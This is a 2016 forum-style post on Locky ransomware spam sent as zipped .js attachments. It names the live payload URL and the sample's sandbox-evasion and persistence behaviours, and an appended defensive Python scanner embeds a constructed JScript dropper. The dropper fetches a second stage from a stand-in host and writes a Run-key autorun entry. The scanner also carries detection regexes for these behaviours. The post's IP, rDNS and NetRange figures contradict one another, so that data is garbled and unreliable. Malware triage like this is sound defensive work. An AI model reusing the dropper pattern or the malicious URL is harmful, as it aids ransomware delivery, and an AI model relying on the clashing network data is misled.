- Virus Guy
May 7, 2016, 9:31 pm
direct-to-mx spam came from, but it's from a large mid-western US
Received: from DELL-PC ([xxx.yyy.232.155])
Attachment: TICKET-T(bunch of numbers).zip
I still say that Macro$haft should pull .zip file-handling /
decompression capability from Win-8/win-10, because (a) nobody
compresses files anymore (does windoze even have the native capability
to perform .zip compression?) and (b) it's bloody obvious that sending
these .js scripts (and many other forms of malware) as zip-compressed
email attachments is critical to the exploit chain of operation.
This script file:
- Performs some HTTP requests (buntrocks.com/09y8hb7v6y7g)
- Attempted to delay the analysis task by a long amount of time
(WScript.exe tried to sleep 1566864 seconds, actually delayed
analysis time by 0 seconds)
- Tries to unhook Windows functions monitored by Cuckoo
- Installs itself for autorun at Windows startup
"buntrocks.com" is (currently) resolving to 22.214.171.124
rDNS for 126.96.36.199 is boson.dnsprotect.com.
188.8.131.52 is assigned to:
NetRange: 184.108.40.206 - 220.127.116.11
Organization: Global Net Access, LLC (GNAL-2)
Address: 1100 White St SW
OrgTechName: GNAX ENGINEERING
The file 09y8hb7v6y7g was apparently analyzed at 7:32 pm Thursday night.
It's ID'd as Locky, i.e. ransomware.
By the way, buntrocks.com still resolves to 18.104.22.168, and more than
48 hours later is still serving up the Locky payload:
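One gateway-side check that follows from the post above (a script file inside a mailed .zip, plus the three Cuckoo findings), written here as an added Python example that is not from the original post or the analyzed sample: it opens an attachment archive in memory, follows zip-in-zip nesting, flags Windows script members by their last extension, and greps JScript members for the sandbox sleep, HTTP download and Run-key persistence behaviours Cuckoo listed. The extension list, the regexes, the file names and the embedded sample script are constructed assumptions for the demo, not the actual 09y8hb7v6y7g file.

```python
"""Triage a mailed .zip for Windows script droppers (added example)."""
import io
import os
import re
import zipfile

# File types WSH/mshta/cmd will execute on double-click. Assumption: none of
# these ever belongs in a legitimate mail attachment at this site.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".cmd", ".bat", ".ps1"}
MAX_NESTING = 2  # follow zip-in-zip this many levels deep

# Indicators matching the three Cuckoo findings quoted in the post. The
# regexes are assumptions about how a JScript downloader typically spells them.
INDICATORS = {
    # WScript.Sleep takes milliseconds; six or more digits is >= 100 s,
    # long enough to outlast a typical sandbox run.
    "sandbox_sleep": re.compile(r"WScript\.Sleep\s*\(\s*\d{6,}", re.I),
    # COM objects commonly used to fetch and write a second stage.
    "http_download": re.compile(r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I),
    # Run-key persistence via WScript.Shell.RegWrite.
    "autorun_runkey": re.compile(r"RegWrite\s*\(\s*[\"']HK[^\"']*\\Run\\", re.I),
}


def scan_script(text: str) -> dict:
    """Map each indicator name to whether it appears in the script text."""
    return {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}


def triage(zip_bytes: bytes, depth: int = 0, prefix: str = "") -> dict:
    """Open the archive in memory, recurse into nested zips, scan script members."""
    report = {"scripts": {}, "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            # splitext keeps only the last extension, so "attachment.doc.js" is .js
            ext = os.path.splitext(name)[1].lower()
            if ext == ".zip" and depth < MAX_NESTING:
                inner = triage(zf.read(name), depth + 1, prefix + name + "/")
                report["scripts"].update(inner["scripts"])
            elif ext in SCRIPT_EXTS:
                text = zf.read(name).decode("utf-8", errors="replace")
                report["scripts"][prefix + name] = scan_script(text)
    if report["scripts"]:
        report["verdict"] = "block"  # policy: any script in a mailed zip is blocked
    return report


# Constructed JScript resembling the behaviours Cuckoo reported; not the real
# payload. 1566864 s from the report is 1566864000 ms for WScript.Sleep.
SAMPLE_JS = r"""
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://example.invalid/stage2", false);
WScript.Sleep(1566864000);
var sh = new ActiveXObject("WScript.Shell");
sh.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\upd", "wscript.exe x.js", "REG_SZ");
"""


def build_sample_zip(nested: bool = False) -> bytes:
    """Build a zip in memory: a double-extension .js, optionally wrapped in another zip."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("attachment.doc.js", SAMPLE_JS)  # constructed file name
    if not nested:
        return inner.getvalue()
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("inner.zip", inner.getvalue())
    return outer.getvalue()


def build_benign_zip() -> bytes:
    """A harmless archive with no script members, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample_zip()))
    print(triage(build_sample_zip(nested=True)))
    print(triage(build_benign_zip()))
```

The verdict is driven by the extension alone; the indicator hits are there for the analyst, since a dropper that is obfuscated enough to hide all three strings still gets blocked for being a script in a mailed archive.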